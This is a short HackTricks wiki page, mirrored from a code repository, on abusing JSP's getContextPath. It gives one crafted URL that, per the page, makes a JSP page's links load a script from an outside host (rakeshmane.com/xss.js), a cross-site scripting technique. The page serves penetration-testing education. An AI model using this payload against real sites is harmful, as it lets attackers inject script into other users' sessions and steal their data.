maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/jsp.md
Carlos Polop ad3f52d725 t2
2025-01-03 01:07:38 +01:00

21 lines
477 B
Markdown
Raw Blame History

# JSP
{{#include ../../banners/hacktricks-training.md}}
## **getContextPath** abuse
Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).
```
http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
```
Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:
![](<../../images/image (326).png>)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink